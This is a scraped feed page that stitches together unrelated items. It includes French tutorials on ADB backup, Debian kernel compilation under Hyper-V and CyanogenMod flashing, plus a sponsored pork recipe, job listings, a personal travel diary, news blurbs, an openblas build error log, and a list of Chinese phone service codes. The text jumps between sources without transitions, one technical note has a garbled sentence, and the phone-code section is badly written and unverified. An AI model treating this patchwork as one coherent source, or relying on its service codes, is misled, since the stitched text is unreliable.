Alors je vous prévient avant de tout "péter" votre tout nouveau Galaxy S4, il convient de faire attention et pas faire comme moi le boulet qui "restore" à l'arrache des datas venant d'une ROM custom vers une ROM officielle ... vous allez me dire sans commentaires ...

Bref, il sera donc convenable de ne choisir que les applications ayant un intérêt de transfert parce que notre amis ADB est capable de faire un backup complet DATA + APPLI.

Environnement 

Je suis sous Win8 x64, j'ai téléchargé le SDK Android que j'ai décompressé dans le répertoire qui va bien.

Il faudra aussi installer le SDK de Java.

Pas possible d'utiliser ADB sans acquerir le Kernel correspondant à la version de l'android on va donc démarrer le gestionnaire du SDK par double click de android.bat présent dans le répertoire  C:\Program Files\adt-bundle-windows-x86_64-20130522\adt-bundle-windows-x86_64-20130522\sdk\tools On choisit la version d'android qui correspond 4.2.2:

ADB1.png

 

 

 

 

 

 

Une fois cela fait se rendre dans le répertoire du SDK:C:\Program Files\adt-bundle-windows-x86_64-20130522\adt-bundle-windows-x86_64-20130522\sdk\platform-tools

 

 

 

 

 

 

Activer le debogage USB de votre appareil, dans options de développement des paramètres.
On branche le mobile source en USB.
Depuis une fenêtre de commande DOS on va vérifier que le phone réponde:
adb devices
Devrait répondre un ID + device. Cool! tout va bien!

Le Backup

Maintenant on va rechercher les packages que l'on souhaite sauvegarder depuis la liste des packages installés.
adb shell pm list packages -f > list.txt
Nous voici donc avec une liste contenant toutes les applications du téléphone. Elle se décompose sous la forme:
package:/mnt/asec/com.kiloo.subwaysurf-2/pkg.apk=com.kiloo.subwaysurf
Pour le coup je n'ai que quelques jeux et quelques applications un peu galère à configurer, candidates au "restore", donc il suffit de prendre le nom de la variable pkg.apk.
Ici com.kiloo.subwaysurf.
Je vais donc sauvegarder l'application et ses données avec la commande suivante:
adb backup -apk -noshared -nosystem com.kiloo.subwaysurf -f com.kiloo.subwaysurf.ab
Je retrouve mon fichier de sauvegarde dans le répertoire local de mon SDK. retrouvez les options de ADB ici. Il faudra votre confirmation du coté du téléphone pour accepter le transfert.

Le restore

Débrancher le téléphone source. Pour plus de sécurité tuer le service ADB dans le gestionnaire des tâches WINDOWS.
Brancher le téléphone cible.
Et lancer le "restore" avec la commande suivante:
adb restore com.kiloo.subwaysurf.ab
Vous devrez encore confirmer le "rerstore" coté téléphone. 
Si quelque chose se passe mal ou pas. Arrêter le processus ADB et recommencer...

Pour aller plus loin

Pour sauvegarder toutes les applications du téléphone utiliser la commande suivante:
adb backup -all -apk -noshared -nosystem -f galaxyS2-backup.ab
Vous pouvez alors transformer cette archive en fichier TAR pour la parcourir ou la modifier. J'ai trouvé ici un exécutable en java pour la transformation dans un sens ou dans l'autre.
adb4.png

 

 

 

 

 

 

 

 

 

 

 

 

 


          Debian 6.0 (Squeeze) sous Hyper-V: faire fonctionner les Drivers de la carte réseau virtuelle & sortir le réseau du mode LEGACY.   
Debian logoQuand on installe une Debian sous Hyper-V on est obligé de le faire avec une carte réseau émulé (LEGACY) qui s'avère par la suite limité si l'on se sert de la VM comme serveur, et donc l'accessibilité dans le réseau est impossible ou très limité. On doit donc en passer par une compilation du noyau afin d’activer le support hyper-V.

Pour ma part je devais installer un serveur de Monitoring, qui ne joignait pas le serveur hyperV, et qui en plus "ramait" sévèrement ...

En root hein ;) , On commence par télécharger un noyau depuis le dépôt Linux Kernel officiel, allez soyons fou prenons la dernière version :)

sudo apt-get install git-core kernel-package fakeroot build-essential ncurses-dev
cd /usr/src
wget --continue http://www.kernel.org/pub/linux/kernel/v3.0/linux-3.6.6.tar.bz2
tar jxvf linux-3.6.6.tar.bz2
cd linux-3.6.6

On copie l'ancienne conf dans la nouvelle source:

cp /boot/config-`uname -r` ./.config

Ensuite on lance le menu de configuration du noyau:

make menuconfig

Pour info tous ce qui concerne hyper-V se trouve dans les sous menu suivant:

DEVICE DRIVERS / NETWORK DEVICE SUPPORT / MICROSOFT HYPER-V VIRTUAL NETWORK DRIVER


DEVICE DRIVER    / MICROSOFT HYPER-V CLIENT DRIVER

compilLinuxDebian.png
Une fois vos options sélectionnées on compile ...

make-kpkg clean
fakeroot make-kpkg --initrd --append-to-version=-hyper-v kernel_image kernel_headers


Et puis on part préparer le Diner, diner ou déjeuner accessoirement ... :)

En revenant on installe le nouveau noyau et on reboot:

cd ..
dpkg -i linux-image-3.6.*
reboot


Vérifions que les modules ont été chargés:

lsmod | grep 'hv_'
hv_utils                4556  0
cn                      3509  1 hv_utils
hv_storvsc              7623  2
hv_netvsc              15083  0
scsi_mod              161603  3 sd_mod,hv_storvsc,libata
hv_vmbus               28424  3 hv_utils,hv_storvsc,hv_netvsc


cat /var/log/messages | grep 'hv_'
.......
Nov 20 16:37:41 monitoring kernel: [    0.444447] hv_vmbus: child device vmbus_0_1 registered
Nov 20 16:37:41 monitoring kernel: [    0.444506] hv_vmbus: child device vmbus_0_2 registered
Nov 20 16:37:41 monitoring kernel: [    0.444553] hv_vmbus: child device vmbus_0_3 registered
Nov 20 16:37:41 monitoring kernel: [    0.444597] hv_vmbus: child device vmbus_0_4 registered
Nov 20 16:37:41 monitoring kernel: [    0.444642] hv_vmbus: child device vmbus_0_5 registered
Nov 20 16:37:41 monitoring kernel: [    0.444689] hv_vmbus: child device vmbus_0_6 registered
Nov 20 16:37:41 monitoring kernel: [    0.444733] hv_vmbus: child device vmbus_0_7 registered
Nov 20 16:37:41 monitoring kernel: [    0.444777] hv_vmbus: child device vmbus_0_8 registered
Nov 20 16:37:41 monitoring kernel: [    0.444821] hv_vmbus: child device vmbus_0_9 registered
Nov 20 16:37:41 monitoring kernel: [    0.444897] hv_vmbus: child device vmbus_0_10 registered
Nov 20 16:37:41 monitoring kernel: [    5.444163] hv_vmbus: registering driver hv_netvsc
Nov 20 16:37:41 monitoring kernel: [    5.445448] hv_vmbus: registering driver hv_storvsc
Nov 20 16:37:41 monitoring kernel: [    5.445541] hv_netvsc: hv_netvsc channel opened successfully
Nov 20 16:37:41 monitoring kernel: [    5.548471] hv_netvsc vmbus_0_10: Device MAC 00:15:5d:00:49:19 link state up
Nov 20 16:37:41 monitoring kernel: [   24.814342] hv_utils: Registering HyperV Utility Driver
Nov 20 16:37:41 monitoring kernel: [   24.814347] hv_vmbus: registering driver hv_util


Bon après je vous passe les détails de comment basculer une carte LEGACY en carte réseau classique :)
          CYANOGEN 9 NIGHTLY sur Galaxy S2   

CYANOGENMOD_915156.jpgJ'en est eu marre d'attendre la ROM ICS de SAMSUNG. Alors je me suis décidé de revenir sur la CYANOGEN. Rom que j'avais testée sur un HTC Desire.

On commence par une mise en garde. Comme je le stipule ici, les manipulations décrite ci-après peuvent potentiellement bloquer votre téléphone. Je ne peux donc être tenu pour responsable dans le cas ou votre téléphone se transforme en brique et est inutilisable.
Je n'ai pas cherché à sauvegarder les données des applications, j'en avais pas besoin.

Pour ma part mon S2 est I9100 (PAS I9100G !!!)

Sauvegarder votre téléphone avant tout

Alors là c'est la fête, imaginez vous, flasher votre téléphone en retrouvant tous vos contacts, SMS et historiques d'appels !!!
On commence par se rendre sur le MARKET ANDROID et on télécharge deux applications gratuites:
La première va sauvegarder toutes vos applications. La deuxième sauvegardera les SMS, les contacts, ainsi que les LOG d'appels.
Une fois la cyanogen fonctionnelle il faudra réinstaller ces applications pour remettre en place les données.
Vérifier en branchant le téléphone en USB sur votre PC que les répertoire de sauvegarde sont bien présents sur la carte SD.
Au cas où, contrôler que vos photos sont bien sur la SD, et par mesure de sécurité transférer vos données de la SD sur votre PC.

Installation du "ClockWorkMod Recovery"

Le clockWorkMod est en fait le noyau du téléphone. C'est lui qui va vous donner la possibilité de démarrer le téléphone en mode mise à jour afin de pouvoir installer CYANOGEN. Voici la procédure.

Se rendre sur le site de cyanogen et télécharger les pré-requis et à savoir:

  • codeworkx's Kernel with the ClockworkMod Recovery.
  • Heimdall Suite.
  • La version de cynaogen que l'on souhaite installer.
  • Les applications de base GOOGLE.

Décompresser le Kernel (ClockworkMod) et le  Heimdall Suite. Copier le Kernel depuis le répertoire décompressé de "ClockworkMod" vers le répertoire où se trouve la suite Heimdal, c'est un fichier qui se nomme zImage.

Copier la ROM CYANOGEN et les applications GOOGLE à la racine de la carte SD dans le téléphone.

Mode recoverySans le connecter au PC, démarrer le téléphone en mode RECOVERY, en appuyant simultanément sur les touches VOLUME BAS, TOUCHE HOME, et BOUTON DE DÉMARRAGE, à l'invite cliquez sur le bouton volume haut pour confirmer.
Puis se rendre dans le répertoire contenant la suite Heimdal et plus précisément dans le répertoire Drivers.
Là vous trouverez un programme nommé zadig.exe. Double cliquez dessus une fenêtre s'ouvre. Connectez le téléphone au PC avec le câble. Cliquez sur Options dans le menu du haut puis sur LIST ALL DEVICE. Dans la liste déroulante vous devriez voir apparaître GADGET SERIAL que vous sélectionnez puis vous cliquez sur le gros bouton INSTALL DRIVER.
Fermer Zadig, puis ouvrez une invite de commande en mode administrateur, puis se rendre dans le répertoire \heimdall-suite-1.3.2-win32\Heimdall Suite\. Saisir la commande suivante: heimdall flash --kernel zImage

flashingS2.png

Et voilà le noyau est installé et le téléphone reboot tout seul.

PAS DE PANIQUE, deux problèmes UN GROS POINT D'EXCLAMATION vous signalant que vous venez de perdre la garantie de votre téléphone et le téléphone ne veut plus BOOTER et c'est normal car, il faut maintenant installer la ROM.

Installation de CYANOGEN 9

Même si le téléphone semble ne plus répondre appuyez simultanément sur les touches VOLUME HAUT, TOUCHE HOME, et BOUTON DE DÉMARRAGE jusqu'à ce que la fenêtre ci après apparaisse:

modeRecovery

Il faudra alors effacer toutes les données contenues dans le téléphone, ceci améliorera la stabilité de la ROM.
Cliquez sur toutes les options suivantes:

- Wipe data/factory reset
- Wipe cache partition
- Wipe Dalvik cache (advanced)
- Wipe battery stat (advanced) pas obliger
- Format System (mount and storage)
- Format cache (mount and storage)
- Format data (mount and storage)

Enfin installer la ROM , ainsi que les APPLI GOOGLE à l'aide du menu install ZIP FROM SDCARD.

Redémarrer le téléphone.

Le point d'exclamation au démarrage

triangle jaune galaxy s2Pour enlever ce point d'exclamation et remettre le compteur de FLASH SAMSUNG à zéro, j'ai trouvé un petit programme sur le forum XDA. Attention à utiliser avec précaution apparemment, il peut rendre le téléphone inutilisable!




          Bacon Crusted Pork Tenderloin with Summer Squash Succotash    
[FTC Standard Disclaimer]  This post is sponsored by Smithfield's line of Marinated Fresh Pork products.  Any stated opinions are my own.

Summer time is here and that means time for some of the best vegetables of the year.  Summer can also mean chaotic schedules but that doesn't mean you don't have time to make a quick dinner like this Bacon Crusted Pork Tenderloin with Summer Squash Succotash.

Smithfield Marinated Fresh Pork #RealFlavorRealFast

I was able to get this done in about 30 minutes because I used Smithfield's Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin for the main course.  They already did the prep work for me, including that bacon crust.  I didn't have to do anything other than take it out of the package and roast it.

Since Smithfield uses only 100% fresh pork in these products, we wanted to use the freshest vegetables.  So we headed to the Farmers Market in Maryville, Tennessee to see what the local farms had to offer.

We ended up buying corn (not all of it!), yellow squash, yellow and green zucchini, bell pepper, sweet onion, and some small variety tomatoes.

Normally I lean towards contrasting flavors but Alexis had the idea to echo the tastes of hardwood smoked bacon and cracked black pepper in our succotash.  She was absolutely right because this was perfect together. The roasted tomatoes brought it all together with their sweet, slightly acidic flavor brightening the entire dish. 

Bacon Crusted Pork Tenderloin with Summer Squash Succotash #RealFlavorRealFast

Bacon Crusted Pork Tenderloin with Summer Squash Succotash

Ingredients




  • Smithfield Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin
  • 1 cup cherry tomatoes
  • olive oil
  • kosher salt
  • 6 slices Smithfield Hometown Original Sliced Bacon, chopped
  • 2 cups Summer squash, cut into 1/2" cubes
  • 1 cup diced sweet onion
  • 1 cup fire roasted corn kernels (about 2 ears or 1 can, drained)
  • 1/3 cup fire roasted red bell pepper
  • 1 1/2 teaspoons kosher salt
  • 1 teaspoon cracked black pepper

Instructions

  1. Set up your grill for indirect cooking and preheat it to 425°f (medium-high heat).
  2. Fire roast the tomatoes and pork.  Lightly coat the tomatoes with a small amount (1/2 teaspoon or so) of olive oil and season with kosher salt.  Place on a small roasting pan.  Place the pan and the Smithfield pork tenderloin on the grill, close the lid and roast until the pork reaches an internal temperature of 140°f - about 25 to 30 minutes.  Meanwhile make the succotash.
  3. Preheat a heavy bottom skillet over medium-low heat on a grill side burner or stove top.  Add the chopped bacon and cooked until the bacon is crisp, about 8 minutes.  Use a slotted spoon to remove the bacon to a paper towel lined plate.  Remove all but 2-3 tablespoons of rendered bacon fat.
  4. Add the squash and onion and season with salt and pepper.  Cook, stirring occasionally, until they are tender, about 5 to 8 minutes.  
  5. Add the corn and bell pepper, stir to mix in and cook until warmed through, about 1-2 minutes. Taste for seasoning, adjust with salt and pepper as desired.  Remove from heat and garnish with bacon crumbles.
  6. Remove the tomatoes and Smithfield pork tenderloin from heat and allow to rest for 5 minutes. 
  7. Slice the tenderloin and serve with the roasted tomatoes and Summer squash succotash.

Notes/Substitutions 


  • Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin - This actually also goes well with Smithfield's Roasted Garlic and Cracked Black Pepper Marinated Fresh Tenderloin as well.  They have expanded their marinated fresh products to include a wide variety of fresh cuts, including pork roasts, loin filets, sirloins, pork chops and tenderloins, and can be sliced or cubed for even faster cooking. 

  • Summer squash blend - We ended up using the yellow and green zucchini but you can use whatever is fresh and in season.



Fresh pork and fresh veggies - hard to go wrong there.

You can buy fire roasted corn on the canned vegetable aisle now and jarred fire roasted red bell peppers are available as well.  I prefer to do my own and grilled these on a gas powered infrared grill.

How to remove corn from the cob
With normal sized ears, you get about 1/2 cup of corn per ear.

I fire roasted mine on a kamado style grill but you can use a kettle grill, gas grill, pellet cooker, or even your oven.  The typical indirect set up for a kamado grill is like this, with a plate setter or heat deflector between the meat and the hot coals. Obviously you take the meat out of the package, this is just for demonstration purposes.

That set up works fine.  But what works even better is to use a raised rack on your grill or the upper rack of your oven.  Positioning the meat higher up in the grill will let you use the heat reflecting down from the grill lid to do a better job of crisping that bacon on top of the roast.  Here I used a simple homemade raised rack consisting of a spare grill grate and 4 legs made out of bolts, nuts, and washers.

The bacon in the crust is already hardwood smoked but I used natural hardwood lump coal for fire roasting the pork tenderloin to reinforce the smokiness.

When you put the tenderloin on the grill, make sure that the bacon crust is facing upwards.  It will be obvious which side is the bacon crust once you open the package.  That's parchment paper under the tomatoes, I use it for easier clean up.  I used Korean sea salt on the tomatoes because I like the huge flakes but kosher salt works fine.

Mise en place (aka "mess in place") makes your cooking easier.  You can have all of this prepped out the night before and save even more time.

Side burners on grills tend to run hotter than stove top burners, so it helps greatly to use a heavy bottom pan like this cast iron pan.  

Tip:  If you want to take the Smithfield Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin to the next level, spritz it every 10 minutes with an 8:1 mixture of apple juice and bourbon.  The sweet smoky flavor rocks with the bacon and black pepper.


Summer Squash Succotash recipe
You can just stir yours but I like to toss the veggies to get that rendered bacon and seasoning all over them.

recipe ideas summer squash and or zucchini
Once your squash is just starting to turn tender, it is time to add the other veggies.  It took right at 5 minutes for mine but it could take as long as 8.

Smithfield Marinated Fresh Pork #RealFlavorRealFast
Mmmmm crispy bacon.  Fire roasting the tomatoes makes them tender and concentrates their naturally sweet taste.

Summer squash zucchini succotash
The general rule of thumb is that eating a color variety of vegetables is good for you so this must be a multi-vitamin! 

Handle the roast carefully when taking it off.  I recommend using a long spatula instead of tongs because squeezing the tongs can break off pieces of the crust.

Smithfield Marinated Fresh Pork #RealFlavorRealFast
I surprised myself that I was able to get this done in 30 minutes.  I'm notorious for dragging out dinner and eating at 8pm.
Here's another idea for using their Marinated Fresh Pork products. 


Smithfield is also challenging you to see what you can do with Marinated Fresh Pork to get a flavorful meal ready in about 30 minutes with their “Real Flavor, Real Fast” contest. For more 30-minute meal preparation ideas, and to submit your original tip for a chance to win great prizes, head to www.SmithfieldRealFlavorRealFast.com

Addendum:  I'm proud to have made it through an entire post about succotash without saying that word which rhymes with buffering. 

          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Travel day morning no-coffee notes   

Today's a travel day, starting now, at 4:45AM Pacific. My flight leaves Seattle in three hours, change planes in Atlanta, arrive in Jacksonville, then drive for 1.5 hours before arriving at the beach, assuming all goes well, knock wood, praise Murphy. Add three hours for time zones, and I should get home in time for Sixty Minutes. I'll get my daily walk in Atlanta.

A picture named washington.gifI had a very stimulating visit with Microsoft, and decided to stay in the US for my 50th birthday, only eight days away. I'll go to England toward the end of the month. Reason --> I want to spend two or three weeks working on the outliner. It's overdue. It got the kernel changes it needed, thanks to Dave Luebbert. Of course it's still a bit rough, and it will be when the beta is made publicly available, but it works, it has the right window dressing, now the furniture needs to be brought in (not all of it) and then it's time to sweep the floors, before the occupants arrive and put dishes in the cabinets and pictures on the wall. I want to get back to working with users as a software developer. I miss it. A lot.

Dave Luebbert and I had a great visit too. He called last night to talk some about the outliner. He wanted to know if an item could be routed to more than one category. I said it could. He said he had listened to the podcast with my dad, and like everyone else who heard it, was charmed. IPSTIQ all the way. Kosso says that to me all the time. It turns out he's friends with Phil Toronne. Phil and Beth are really smart, really nice, charming, honest. But if you listened to yesterday's podcast you know that too.

Had dinner last night with Chris Pirillo and Ponzi. She's from North Carolina. That means she's from Cackalacky and a Tarheel. Forgot to say that to her. We talked about Julie Leung, and Gnomedex. I'm going to get a special deal for Scripting News readers. You gotta go, it's going to be a great show. I told Chris about the outliner. He did a little jumping up and down thing. It's good. I'm going to talk about the outliner here in June. And in England in May. And New York. Maybe elsewhere.

Okay now I have to shut this thing and get out of here, go to the airport and get on the plane.

Namaste y'all!


          TuxMachines: Latest Clonezilla Live Stable Update Includes a Lite Server, Linux Kernel 4.11.6   

Clonezilla Live and GParted Live developer Steven Shiau is pleased to announce the release and immediate availability for download of a new stable version of his widely-used Clonezilla Live project.

Read more

read more


          Basis Administrator - Aecon Group - Toronto, ON   
Performs implementation of OSS notes, support pack upgrades, kernel upgrades and systems refreshes across the landscape....
From Aecon Group - Tue, 06 Jun 2017 23:47:00 GMT - View all Toronto, ON jobs
          Slides: Machine Learning Summer School @ Max Planck Institute for Intelligent Systems, Tübingen, Germany   


Here are the slides of some of the presentations at the Machine Learning Summer School at the Max Planck Institute for Intelligent Systems, Tübingen, Germany

Shai Ben-David
(Waterloo)
 Learning Theory.
Slides part 1 part 2 part 3
Dominik Janzing
(MPI for Intelligent Systems)
 Causality.
Slides here.
Stefanie Jegelka
(MIT)
 Submodularity.
Slides here.


Jure Lescovec
(Stanford)
Network Analysis.
Slides 1 2 3 4




Ruslan Salakhutdinov
(CMU)
Deep Learning.
Slides part 1 part 2


Suvrit Sra
(MIT)
Optimization.
Slides 1 2 3A 3B
Bharath Sriperumbudur
(PennState)
Kernel Methods.
Slides part 1 part 2 part 3


Max Welling
(Amsterdam)
Large Scale Bayesian Inference with an Application to Bayesian Deep Learning
Slides here.




Bernhard Schölkopf
(MPI for Intelligent Systems)
Introduction to ML and speak on Causality.
Slides here.

h/t Russ




Join the CompressiveSensing subreddit or the Google+ Community or the Facebook page and post there !
Liked this entry ? subscribe to Nuit Blanche's feed, there's more where that came from. You can also subscribe to Nuit Blanche by Email, explore the Big Picture in Compressive Sensing or the Matrix Factorization Jungle and join the conversations on compressive sensing, advanced matrix factorization and calibration issues on Linkedin.

          Wiki Page: Solid Working Area Accuracy Information   
Applies To Product(s): MICROSTATION Version(s): 08.00.01.19 Environment: N\A Area: General Subarea: N\A Original Author: Bentley Technical Support Group Problem Solid Working Area Accuracy Information Version: 08.00.01.19 Product: MicroStation V8 Area: Parasolid, Solution Information: The solid modeling kernels require coordinate data at a fixed precision. In order to guarantee enough precision is available, MicroStation defines the solids working area (SWA). The SWA is effectively a design cube centered around the center of design. The length of the cube's edges can be found under Settings > Design File > Working Units > Advanced > Working Areas > Solids. The purpose of the SWA value is to reduce the working volume to a more manageable size when working with solids. This also increases the accuracy for solids. Maximum accuracy for solids can be achieved by setting the Resolution to 1,000,000 per Meter and setting Solids to 1 Kilometer. How much accuracy is required depends more on the size of the smallest detail (blend , etc.) rather than the size of the solid itself. Because of this, it is difficult to give a definitive answer and also depends on the types of operations that are planned on being done and on what types of geometry. Less accuracy is required for Boolean operations on orthonginal (square) elements vs. dealing with a lot of complex blends on B-Spline surfaces. The precision needs to at least cover the smallest detail, but somecalculations. Conclusion: The Solids Working Area can be changed, and there is a lot of flexibility there, but the optimal setting is when the SWA is 1 km (to match the ParaSolids modeling kernel accuracy). Notes: Changing the SWA value does not change the Resolution, that is the size of elements in the file will not be changed. It is operations in ParaSolid may require more precision for the internal possible to move ParaSolid elements out of the SWA, but they will not be able to be modified until returning with the SWA. The SWA is centered about the center of the design area, not the global origin. Not applicable to V8i based products See Also
          NSA is on GitHub, sharing dozens of projects   
One of the US government’s most tight-lipped organisations, National Security Agency (NSA) has opened an official GitHub account and has already shared repositories codes for 32 different projects under the NSA Technology Transfer Program (TTP).

Some of these are ‘coming soon.’ Many aren’t new, either, and have been available for some time. and Several of the technologies have been in use for years. SELinux (Security-Enhanced Linux) for example, has been part of the Linux kernel for years. None of them is as revealing as you might have hoped, but there are several entries of note. The “Lat Lon Tools Plugin,” for example, is a suite of tools used to zoom into coordinates on Google Maps and Google Earth, while “Maplesyrup” was created to look at the security state of an ARM-based device.

The most secretive of the US’ intelligence agencies employs genius-level coders and mathematicians in order to break codes, gather information on adversaries, develop hacking tools like EternalBlue to defend the country against digital threats.

The move is a step towards a more open environment, however, much of an oxymoron that might be.

Since the Snowden leaks in 2013, the organisation that has always preferred to work in the dark has gradually increased its public presence. It opened a Twitter account the same year, the leak was made and it was the first profile Edward Snowden followed when he joined the micro-blogging site in 2015.

Engaging with techies via Github is a great way to sanitise its image, and potentially recruit talent.

          Friday Farmers Market At Everett Mall Looking For Kids   
The KERNEL Kids Program has been added to the list of things happening at the Friday Farmers Market at the Everett Mall. Every Friday from 3-7 PM KERNEL (Kids Eating Right-Nutrition and Exercise for Life), is a project designed to engage children in learning about lifelong healthy eating habits, gardening, and exercise. Upon completion of […]
          Error installing package openblas-0.2.19.p0 on OS X   
My computer is a MacBook Pro 13", with 2.8 GHz Intel Core i7 processor, and 16 GB 1600 MHz DDR3. The OS X version is 10.9.5. I installed SAGE from source and had 1 Error message (see below). I am not very experienced so I would appreciate all help I can get in order to fix this problem (what happens if I just disregard the existence of the error?) Relevant contents of the log file /Users/MacMesser/Documents/INST_SAGE/sage-7.6/logs/pkgs/openblas-0.2.19.p0.log -DCHAR_CNAME=\"sdsdot_k\" -DNO_AFFINITY -I.. -UDOUBLE -UCOMPLEX -UCOMPLEX -UDOUBLE -DDSDOT ../kernel/x86_64/../generic/dot.c -o sdsdot_k.o gcc -c -O2 -DMAX_STACK_ALLOC=2048 -DEXPRECISION -m128bit-long-double -Wall -m64 -DF_INTERFACE_GFORT -fPIC -DNO_WARMUP -DMAX_CPU_NUMBER=4 -DASMNAME=_dsdot_k -DASMFNAME=_dsdot_k_ -DNAME=dsdot_k_ -DCNAME=dsdot_k -DCHAR_NAME=\"dsdot_k_\" -DCHAR_CNAME=\"dsdot_k\" -DNO_AFFINITY -I.. -UDOUBLE -UCOMPLEX -UCOMPLEX -UDOUBLE -DDSDOT ../kernel/x86_64/../generic/dot.c -o dsdot_k.o ../kernel/x86_64/sdot_microk_haswell-2.c:37:no such instruction: `vxorps %ymm4, %ymm4,%ymm4' ../kernel/x86_64/sdot_microk_haswell-2.c:38:no such instruction: `vxorps %ymm5, %ymm5,%ymm5' ../kernel/x86_64/sdot_microk_haswell-2.c:39:no such instruction: `vxorps %ymm6, %ymm6,%ymm6' ../kernel/x86_64/sdot_microk_haswell-2.c:40:no such instruction: `vxorps %ymm7, %ymm7,%ymm7' ../kernel/x86_64/sdot_microk_haswell-2.c:41:Alignment too large: 15. assumed. ../kernel/x86_64/sdot_microk_haswell-2.c:43:no such instruction: `vmovups (%rsi,%rax,4), %ymm12' ../kernel/x86_64/sdot_microk_haswell-2.c:44:no such instruction: `vmovups 32(%rsi,%rax,4), %ymm13' ../kernel/x86_64/sdot_microk_haswell-2.c:45:no such instruction: `vmovups 64(%rsi,%rax,4), %ymm14' ../kernel/x86_64/sdot_microk_haswell-2.c:46:no such instruction: `vmovups 96(%rsi,%rax,4), %ymm15' ../kernel/x86_64/sdot_microk_haswell-2.c:47:no such instruction: `vfmadd231ps (%rdx,%rax,4), %ymm12,%ymm4' ../kernel/x86_64/sdot_microk_haswell-2.c:48:no such instruction: `vfmadd231ps 32(%rdx,%rax,4), %ymm13,%ymm5' ../kernel/x86_64/sdot_microk_haswell-2.c:49:no such instruction: `vfmadd231ps 64(%rdx,%rax,4), %ymm14,%ymm6' ../kernel/x86_64/sdot_microk_haswell-2.c:50:no such instruction: `vfmadd231ps 96(%rdx,%rax,4), %ymm15,%ymm7' ../kernel/x86_64/sdot_microk_haswell-2.c:54:no such instruction: `vextractf128 $1 ,%ymm4,%xmm12' ../kernel/x86_64/sdot_microk_haswell-2.c:55:no such instruction: `vextractf128 $1 ,%ymm5,%xmm13' ../kernel/x86_64/sdot_microk_haswell-2.c:56:no such instruction: `vextractf128 $1 ,%ymm6,%xmm14' ../kernel/x86_64/sdot_microk_haswell-2.c:57:no such instruction: `vextractf128 $1 ,%ymm7,%xmm15' ../kernel/x86_64/sdot_microk_haswell-2.c:58:no such instruction: `vaddps %xmm4, %xmm12,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:59:no such instruction: `vaddps %xmm5, %xmm13,%xmm5' ../kernel/x86_64/sdot_microk_haswell-2.c:60:no such instruction: `vaddps %xmm6, %xmm14,%xmm6' ../kernel/x86_64/sdot_microk_haswell-2.c:61:no such instruction: `vaddps %xmm7, %xmm15,%xmm7' ../kernel/x86_64/sdot_microk_haswell-2.c:62:no such instruction: `vaddps %xmm4, %xmm5,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:63:no such instruction: `vaddps %xmm6, %xmm7,%xmm6' ../kernel/x86_64/sdot_microk_haswell-2.c:64:no such instruction: `vaddps %xmm4, %xmm6,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:65:no such instruction: `vhaddps %xmm4, %xmm4,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:66:no such instruction: `vhaddps %xmm4, %xmm4,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:67:no such instruction: `vmovss %xmm4, (%rcx)' ../kernel/x86_64/sdot_microk_haswell-2.c:68:no such instruction: `vzeroupper' make[4]: *** [sdot_k.o] Error 1 make[4]: *** Waiting for unfinished jobs.... ../kernel/x86_64/saxpy_microk_haswell-2.c:37:no such instruction: `vbroadcastss (%rcx), %ymm0' ../kernel/x86_64/saxpy_microk_haswell-2.c:38:Alignment too large: 15. assumed. ../kernel/x86_64/saxpy_microk_haswell-2.c:40:no such instruction: `vmovups (%rdx,%rax,4), %ymm12' ../kernel/x86_64/saxpy_microk_haswell-2.c:41:no such instruction: `vmovups 32(%rdx,%rax,4), %ymm13' ../kernel/x86_64/saxpy_microk_haswell-2.c:42:no such instruction: `vmovups 64(%rdx,%rax,4), %ymm14' ../kernel/x86_64/saxpy_microk_haswell-2.c:43:no such instruction: `vmovups 96(%rdx,%rax,4), %ymm15' ../kernel/x86_64/saxpy_microk_haswell-2.c:44:no such instruction: `vfmadd231ps (%rsi,%rax,4), %ymm0,%ymm12' ../kernel/x86_64/saxpy_microk_haswell-2.c:45:no such instruction: `vfmadd231ps 32(%rsi,%rax,4), %ymm0,%ymm13' ../kernel/x86_64/saxpy_microk_haswell-2.c:46:no such instruction: `vfmadd231ps 64(%rsi,%rax,4), %ymm0,%ymm14' ../kernel/x86_64/saxpy_microk_haswell-2.c:47:no such instruction: `vfmadd231ps 96(%rsi,%rax,4), %ymm0,%ymm15' ../kernel/x86_64/saxpy_microk_haswell-2.c:48:no such instruction: `vmovups %ymm12, (%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:49:no such instruction: `vmovups %ymm13, 32(%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:50:no such instruction: `vmovups %ymm14, 64(%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:51:no such instruction: `vmovups %ymm15, 96(%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:55:no such instruction: `vzeroupper' make[4]: *** [saxpy_k.o] Error 1 make[3]: *** [libs] Error 1 Error building OpenBLAS real 1m17.400s user 3m33.062s sys 0m56.443s ************************************************************************ Error installing package openblas-0.2.19.p0
          Get The Collection Of Mobile Reset Key    
mobile reset key
Mobile phone is mainly use to talk , but now a day it use not only talk but also many other things, we use it as a camera as a i pod etc.

Some time the phone make over loaded and it need to reset. But we have no way to do it , I give the key to reset it easily






All phone resat




All China
default user code: 1122, 3344, 1234, 5678
*#66*# Set Factory Mode CONFIRMED
*#8375# Show Software Version CONFIRMED
*#1234# A2DP ACP Mode CONFIRMED
*#1234# A2DP INT Mode CONFIRMED
*#0000# + Send : Set Default Language CONFIRMED
*#0007# + Send : Set Language to Russian CONFIRMED
*#0033# + Send : Set Language to French CONFIRMED
*#0034# + Send : Set Language to Spanish CONFIRMED
*#0039# + Send : Set Language to Italian CONFIRMED
*#0044# + Send : Set Language to English CONFIRMED
*#0049# + Send : Set Language to German CONFIRMED
*#0066# + Send : Set Language to Thai CONFIRMED
*#0084# + Send : Set Language to Vietnamese CONFIRMED
*#0966# + Send : Set Language to Arabic CONFIRMED
